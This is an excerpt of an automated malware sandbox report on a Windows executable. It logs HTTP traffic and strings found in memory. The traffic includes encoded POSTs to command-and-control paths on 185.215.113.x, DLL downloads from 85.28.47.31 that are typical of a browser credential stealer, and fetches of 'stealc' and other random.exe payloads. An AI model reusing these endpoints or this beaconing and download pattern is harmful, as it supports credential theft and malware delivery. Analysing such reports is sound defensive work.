Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: Joe Sandbox View IP Address: 85.28.47.31
Source: Joe Sandbox View IP Address: 185.215.113.19
Source: Joe Sandbox View ASN Name: GES-ASRU
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlYou must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlYou must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3077664321.00000270DC61F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://connect.facebook.net/*/sdk.js*FileUtils_closeSafeFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1*://web-assets.toggl.com/app/assets/scripts/*.js*://connect.facebook.net/*/all.js**://www.google-analytics.com/gtm/js**://*.imgur.io/js/vendor.*.bundle.js*://c.amazon-adsystem.com/aax2/apstag.js*://www.everestjs.net/static/st.v3.js**://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://cdn.branch.io/branch-latest.min.js*webcompat-reporter@mozilla.org.xpi*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.jsFileUtils_closeAtomicFileOutputStream*://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.jshttps://smartblock.firefox.etp/play.svg*://track.adform.net/serving/scripts/trackpoint/*://static.chartbeat.com/js/chartbeat_video.jsresource://gre/modules/FileUtils.sys.mjs@mozilla.org/addons/addon-manager-startup;1*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/addons/XPIProvider.jsm*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://pub.doubleverify.com/signals/pub.js*https://smartblock.firefox.etp/facebook.svgpictureinpicture%40mozilla.org:1.0.0*://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js*browser:purge-session-history-for-domain equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: --panel-banner-item-update-supported-bgcolor*://*.adsafeprotected.com/*/unit/*addons-search-detection@mozilla.com*://pubads.g.doubleclick.net/gampad/*ad-blk*resource://builtin-addons/search-detection/addons-search-detection%40mozilla.com:2.0.0https://en.wikipedia.org/wiki/Special:Search*https://ads.stickyadstv.com/firefox-etp*://vast.adsafeprotected.com/vast**://ads.stickyadstv.com/auto-user-sync*resource://search-extensions/google/*://www.facebook.com/platform/impression.php*resource://search-extensions/amazondotcom/*://*.adsafeprotected.com/services/pub**://pubads.g.doubleclick.net/gampad/*xml_vmap2*_closedTabsFromClosedWindowsEnabled equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder 
hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3030702011.00000270C98E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 7www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3073075739.00000270DB85A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3087332031.00000270DDB69000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2995008138.00000270DC21B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AE3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2950780857.00000158A7ADE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3067558634.00000270DB05D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993750168.00000270E21F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105314081.00000270E4003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000003.2958769374.00000270CC685000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2957174991.00000270CC685000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, 
GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @mozilla.org/network/protocol;1?name=filedevtools.debugger.features.javascript-tracingJSON Viewer's onSave failed in startPersistenceFailed to listen. Callback argument missing.Unable to start devtools server on @mozilla.org/uriloader/handler-service;1DevToolsStartup.jsm:handleDebuggerFlag{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=defaultbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools.debugger.remote-websocketWebChannel/this._originCheckCallbackdevtools-commandkey-javascript-tracing-togglereleaseDistinctSystemPrincipalLoader@mozilla.org/dom/slow-script-debug;1devtools/client/framework/devtoolsdevtools-commandkey-profiler-start-stopresource://devtools/shared/security/socket.jsFailed to listen. Listener already attached.Failed to execute WebChannel callback:and deploy previews URLs are allowed.devtools-commandkey-profiler-capturedevtools/client/framework/devtools-browserbrowser and that URL. 
Falling back to devtools.performance.recording.ui-base-urlresource://devtools/server/devtools-server.jsDevTools telemetry entry point failed: Got invalid request to save JSON dataNo callback set for this channel.^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools.performance.popup.feature-flagbrowser.fixup.domainsuffixwhitelist.http://www.inbox.lv/rfc2368/?value=%s^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAGS_MAKE_ALTERNATE_URIisDownloadsImprovementsAlreadyMigratedhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsget FIXUP_FLAG_FORCE_ALTERNATE_URI^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPScheme should be either http or https{c6cf88b7-452e-47eb-bdc9-86e3561648ef}{33d75835-722f-42c0-89cc-44f328e56a86}extractScheme/fixupChangedProtocol<gecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content processhandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/JSONFile.sys.mjs^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)https://e.mail.ru/cgi-bin/sentmsg?mailto=%s_injectDefaultProtocolHandlersIfNeededresource://gre/modules/FileUtils.sys.mjshttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/NetUtil.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/file-input-stream;1resource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callbacknewChannel requires a single object argumentNon-zero amount of bytes must be 
specified@mozilla.org/network/simple-stream-listener;1@mozilla.org/intl/converter-input-stream;1SEC_ALLOW
Source: firefox.exe, 0000001E.00000002.3034852957.00000270D6947000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla 